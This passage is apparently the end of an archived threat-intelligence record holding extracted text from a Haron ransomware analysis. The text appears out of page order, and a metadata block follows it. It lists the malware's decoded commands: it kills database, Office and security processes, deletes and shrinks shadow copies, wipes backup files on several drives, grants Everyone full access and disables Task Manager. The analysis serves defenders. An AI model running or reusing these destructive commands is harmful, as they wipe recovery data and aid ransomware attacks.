/F\r\n/IM steam.exe /F\r\n/IM encsvc.exe /F\r\n/IM excel.exe /F\r\n/IM CNTAoSMgr.exe /F\r\n/IM sqlwriter.exe /F\r\n/IM tbirdconfig.exe /F\r\n/IM dbeng50.exe /F\r\n/IM thebat64.exe /F\r\n/IM ocomm.exe /F\r\n/IM infopath.exe /F\r\n/IM mbamtray.exe /F\r\n/IM zoolz.exe /F\r\nIM thunderbird.exe /F\r\n/IM dbsnmp.exe /F\r\n/IM xfssvccon.exe /F\r\n/IM Ntrtscan.exe /F\r\n/IM isqlplussvc.exe /F\r\n/IM onenote.exe /F\r\n/IM PccNTMon.exe /F\r\n/IM msaccess.exe /F\r\n/IM outlook.exe /F\r\n/IM tmlisten.exe /F\r\n/IM msftesql.exe /F\r\n/IM powerpnt.exe /F\r\n/IM visio.exe /F\r\n/IM winword.exe /F\r\n/IM mysqld-nt.exe /F\r\n/IM wordpad.exe /F\r\n/IM mysqld-opt.exe /F\r\n/IM ocautoupds.exe /F\r\n/IM ocssd.exe /F\r\n/IM oracle.exe /F\r\n/IM sqlagent.exe /F\r\n/IM sqlbrowser.exe /F\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 28 of 29\n\n/IM sqlservr.exe /F\r\n/IM synctime.exe /F\r\nDelete Shadows /all /quiet\r\nresize shadowstorage /for=c: /on=c: /maxsize=401MB\r\nresize shadowstorage /for=c: /on=c: /maxsize=unbounded\r\nresize shadowstorage /for=d: /on=d: /maxsize=401MB\r\nresize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\nresize shadowstorage /for=e: /on=e: /maxsize=401MB\r\nresize shadowstorage /for=e: /on=e: /maxsize=unbounded\r\nresize shadowstorage /for=f: /on=f: /maxsize=401MB\r\nresize shadowstorage /for=f: /on=f: /maxsize=unbounded\r\nresize shadowstorage /for=g: /on=g: /maxsize=401MB\r\nresize shadowstorage /for=g: /on=g: /maxsize=unbounded\r\nresize shadowstorage /for=h: /on=h: /maxsize=401MB\r\nresize shadowstorage /for=h: /on=h: /maxsize=unbounded\r\nGet-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }\r\n/s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c\r\n/s /f /q d:\\*.VHD d:\\*.bac d:\\*.bak d:\\*.wbcat d:\\*.bkf d:\\Backup*.* d:\\backup*.* d:\\*.set d:\\*.win d\r\n/s /f /q e:\\*.VHD e:\\*.bac e:\\*.bak e:\\*.wbcat e:\\*.bkf e:\\Backup*.* e:\\backup*.* e:\\*.set e:\\*.win e\r\n/s /f /q f:\\*.VHD f:\\*.bac f:\\*.bak f:\\*.wbcat f:\\*.bkf f:\\Backup*.* f:\\backup*.* f:\\*.set f:\\*.win f\r\n/s /f /q g:\\*.VHD g:\\*.bac g:\\*.bak g:\\*.wbcat g:\\*.bkf g:\\Backup*.* g:\\backup*.* g:\\*.set g:\\*.win g\r\n/s /f /q h:\\*.VHD h:\\*.bac h:\\*.bak h:\\*.wbcat h:\\*.bkf h:\\Backup*.* h:\\backup*.* h:\\*.set h:\\*.win h\r\n\"C:*\" /grant Everyone:F /T /C /Q\r\n\"D:*\" /grant Everyone:F /T /C /Q\r\n\"Z:*\" /grant Everyone:F /T /C /Q\r\nThanos\r\ncacls.exe\r\n /grant\r\n:F /T /C /Q\r\ntasklist\r\n/v /fo csv\r\n/f /pid\r\nQ1|\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\r\nDisableTaskMgr\r\nSource: https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 29 of 29\n\n} The resource data appears to have header on it but it doesn’t appear to be related to a compression routine:\n00000000: 7b7a 7d03 bd7f 953e a1ca bbad b1f2 97b6 {z}....\u003e........\n00000010: a036 bff2 7555 9ab2 6cbd 35ff 3e27 d40a .6..uU..l.5.\u003e'..\n00000020: e3ff cd43 7ca8 bf19 aff2 a64c 2a5e fc57 ...C|......L*^.W\n00000030: 1815 4212 d2ae 4f60 1240 5751 cbce 126e ..B...O`.@WQ...n\n00000040: 4efc a196 b849 8762 917c 2c2c 4888 52da N....I.b.|,,H.R.\n00000050: 8792 6eaf 4bfd 0430 2263 a42f d943 eda9 ..n.K..0\"c./.C..\n00000060: e739 3f20 b807 426e 222a fcaa d8de 9fd9 .9? ..Bn\"*......\n    Page 2 of 29",
	"extraction_quality": 1,
	"language": "DE",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b"
	],
	"report_names": [
		"decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b"
	],
	"threat_actors": [],
	"ts_created_at": 1775434774,
	"ts_updated_at": 1775791235,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/842b8d5b0468450599b2758c03b080196b22d4fb.pdf",
		"text": "https://archive.orkl.eu/842b8d5b0468450599b2758c03b080196b22d4fb.txt",
		"img": "https://archive.orkl.eu/842b8d5b0468450599b2758c03b080196b22d4fb.jpg"
	}
}